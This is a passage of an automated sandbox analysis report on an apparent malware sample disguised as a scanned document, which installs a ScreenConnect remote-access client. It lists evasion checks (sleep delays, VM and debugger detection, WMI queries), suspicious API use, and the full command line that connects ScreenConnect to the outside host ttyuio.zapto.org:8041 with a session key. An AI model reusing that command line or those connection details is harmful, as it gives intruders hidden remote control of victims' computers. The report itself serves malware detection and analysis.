                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 7684Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599780Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599669Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599411Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599290Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599184Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598926Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597977Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597630Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597512Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597368Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597253Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596358Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595365Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594109Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593561Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593230Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593114Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592760Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592639Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592531Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2641007006.00000261F9A7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2959958449.0000013D88E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2961804623.0000013D8E254000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: dfsvc.exe, 00000001.00000002.2634391699.00000261F76E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: dfsvc.exe, 00000001.00000002.2641007006.00000261F9A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWyc
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2972741197.00000000044C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E4573
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_005E1000
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E3677 mov eax, dword ptr fs:[00000030h]0_2_005E3677
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E6893 GetProcessHeap,0_2_005E6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005E1493
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E4573
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E191F
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1AAC SetUnhandledExceptionFilter,0_2_005E1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7140 -ip 7140Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7140 -s 884Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\j1ypwlr7.xwh\pyk78ccc.bvg\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\j1ypwlr7.xwh\pyk78ccc.bvg\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\j1ypwlr7.xwh\pyk78ccc.bvg\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\screenconnect.clientservice.exe" "?e=support&y=guest&h=ttyuio.zapto.org&p=8041&s=e76a7089-9bd3-460c-8e9c-7b01b18dcd91&k=bgiaaackaabsu0exaagaaaeaaqcpdljbb2ucjqst7j%2beal4srxbn9fngdmzusse%2fjh%2bnkbeoqfhq%2bcr3lypd1ksb17orwp4zvhy7bt585yzidtesloqjgvuwzeifwaakwkfbshg%2fh8gyvt85w1oivud0hejmjtqedcojxvxpd4ojuqhoqhbbylosnsbfrtp0r040%2bcfkcnslvuf01cnsbcaeyuefrkiz%2b8o0yjwrixe6vdrb5cxn%2bauv36m92%2b6%2fhnc5srzm45hr1fu47wa4rara8onacyafp32je3t2cm7eekmt%2bs6hwkgazmp0vlkbgpw3wnp85fhslyn9uz3eztsbn%2f97cfe2jsav4%2brdgima3na8&r=&i=untitled%20session" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1953506652.0000000000102000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeCode function: 0_2_005E1BD4 cpuid 0_2_005E1BD4
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
